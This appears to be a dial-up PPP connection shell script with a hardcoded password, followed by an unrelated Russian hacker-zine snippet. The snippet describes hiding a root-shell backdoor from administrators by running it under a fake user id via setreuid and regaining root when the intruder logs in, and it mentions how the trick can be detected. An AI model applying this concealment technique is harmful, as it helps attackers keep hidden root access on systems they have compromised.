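PASSWORD='mayhem'

MODEM=/dev/cuaa4     # specify modem's slot (on my box /dev/modem points to
                     # COM5 dev)

# in FreeBSD COM5 is on /dev/cuaa4 (COM1 is on cuaa0)
# in Linux u can reach it on /dev/ttyS4

LINE_SPEED=38400

LOCAL_IP=0.0.0.0     # use 0.0.0.0 by default
REMOTE_IP=0.0.0.0    # use 0.0.0.0 by default
NETMASK=255.255.255.255

CHAT_SCRIPT=/tmp/term.scr   # generated chat(8) script; holds the password

###


if [ "$1" = "shutdown" ]; then

  if [ -z "$2" ]; then
    DEVICE=ppp0
  else
    DEVICE=$2
  fi

  rm -f "$CHAT_SCRIPT"
  echo "Shuting down $DEVICE interface"

  if [ -r "/var/run/$DEVICE.pid" ]; then
    if ! kill -INT "$(cat "/var/run/$DEVICE.pid")"; then
      # pppd is already gone but left its pid file behind
      rm -f "/var/run/$DEVICE.pid"
      echo "ERROR: Removed stale pid file"
      exit 1
    fi
    echo "PPP link to $DEVICE terminated."
    exit 0
  fi

  echo "ERROR: PPP link is not active on $DEVICE"
  exit 1
fi

# Create the chat script safely.  Owner-only mode for the new file; remove
# any stale copy; noclobber makes the redirection fail (O_EXCL) rather than
# follow a symlink planted between the rm and the open.  The umask is
# restored afterwards so pppd's own files keep their usual modes.
OLD_UMASK=$(umask)
umask 077
rm -f "$CHAT_SCRIPT"
set -C
cat << _eof_ > "$CHAT_SCRIPT" || { echo "ERROR: cannot create $CHAT_SCRIPT"; exit 1; }
#!/bin/sh
exec chat -v \
TIMEOUT 5 \
ECHO ON \
ABORT '\nBUSY\r' \
ABORT '\nNO ANSWER\r' \
ABORT '\nRINGING\r\n\r\nRINGING\r' \
'' \rATZ \
'OK-+++\c-OK' ATH0 \
TIMEOUT 120 \
SAY "Dialing to ISP...\n" \
OK ATD$TELEPHONE \
CONNECT '' \
SAY "Sending login...\n" \
ogin:--ogin: $LOGIN \
SAY "Sending password...\n" \
assword: $PASSWORD \
'' \d
_eof_
set +C
umask "$OLD_UMASK"

chmod 700 "$CHAT_SCRIPT"

# NOTE: "chat -v" above logs the whole dialogue -- password included -- to
# syslog.  Drop the -v once the link is known to work.
exec /usr/sbin/pppd debug lock modem crtscts $MODEM $LINE_SPEED \
    asyncmap 20A0000 escape FF kdebug 0 $LOCAL_IP:$REMOTE_IP \
    netmask $NETMASK defaultroute connect "$CHAT_SCRIPT"

# eof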
  i
 [+]  universal UNIX process shading
  i
  i  Странно,  что никто  раньше  этим не пользовался при  написании своих
  i  бекдоров и тому  подобного софта.  Итак,  задача: скажем,  нам  нужно
  i  повесить бекдорину с рутовским шеллом так, чтобы у админа не возникло
  i  очевидных подозрений. Решение: запускаем под рутом, и в начале ставим
  i  setreuid(0, 666), где 666 - uid юзера,  под которым мы  будем прятать
  i  наши процессы. Теперь в списке ps наш бекдор будет числиться под  uid
  i  666. А в тот момент, когда ксакеп логинится в систему,  бекдор делает
  i  setreuid(0, 0) и проц снова становится рутовым.  Эта  техника успешно
  i  тестировалась под Linux, FreeBSD, Solaris.. вроде достаточно )
  i  Трюк держится на том, что ps по умолчанию показывает эффективный uid;
  i  реальный uid при этом остаётся 0, и его видно через ps -o ruid,euid (а на
  i  Linux -- в строке Uid: файла /proc/<pid>/status), так что от админа,
  i  который туда смотрит, это не прячет.
  i
 [~]